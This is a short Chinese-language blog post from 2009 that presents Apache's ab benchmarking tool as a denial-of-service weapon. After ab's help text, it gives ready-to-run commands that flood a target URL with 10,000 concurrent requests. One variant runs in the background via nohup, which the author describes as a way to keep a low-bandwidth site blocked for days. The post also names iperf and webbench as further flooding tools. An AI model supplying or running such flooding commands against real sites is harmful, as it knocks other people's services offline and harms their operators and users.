2009/10/22

DDOS攻擊-use apache command ab

* ab 為 apache 用來做apache效能測試的一個指令
$ ab --help
Usage: ab [options] [http[s]://]hostname[:port]/path
Options are:
-n requests Number of requests to perform
-c concurrency Number of multiple requests to make
-t timelimit Seconds to max. wait for responses
-p postfile File containing data to POST
-T content-type Content-type header for POSTing
-v verbosity How much troubleshooting info to print
-w Print out results in HTML tables
-i Use HEAD instead of GET
-x attributes String to insert as table attributes
-y attributes String to insert as tr attributes
-z attributes String to insert as td or th attributes
-C attribute Add cookie, eg. 'Apache=1234. (repeatable)
-H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
Inserted after all normal header lines. (repeatable)
-A attribute Add Basic WWW Authentication, the attributes
are a colon separated username and password.
-P attribute Add Basic Proxy Authentication, the attributes
are a colon separated username and password.
-X proxy:port Proxyserver and port number to use
-V Print version number and exit
-k Use HTTP KeepAlive feature
-d Do not show percentiles served table.
-S Do not show confidence estimators and warnings.
-g filename Output collected data to gnuplot format file.
-e filename Output CSV file with percentages served
-h Display usage information (this message)
-Z ciphersuite Specify SSL/TLS cipher suite (See openssl ciphers)
-f protocol Specify SSL/TLS protocol (SSL2, SSL3, TLS1, or ALL)

* apache 的 ab 指令
ab -n 10000 -c 10000 http://網址 > ddos.txt

* 更狠一點,把命令留在主機,如果該主機為大水管,可以封鎖小水管,透過-c -n 參數來決定封鎖該小水管幾天。
nohup ab -n 10000 -c 10000 http://網址 >ddos.txt 2>ddos_err.txt &

* 經典錯誤使用範例:
http://admin.pixnet.net/blog/post/501100

* 還有一些其他的流量測試軟體,也可以成為 DDOS 的工具
iperf 官方網站 http://sourceforge.net/projects/iperf/
中文介紹 http://benjr.tw/?q=node/369

* 另外一套 網站壓力測試工具 webbench
# http://cs.uccs.edu/~cs526/webbench/webbench.htm
# http://freshmeat.net/projects/web-bench/
張貼留言

like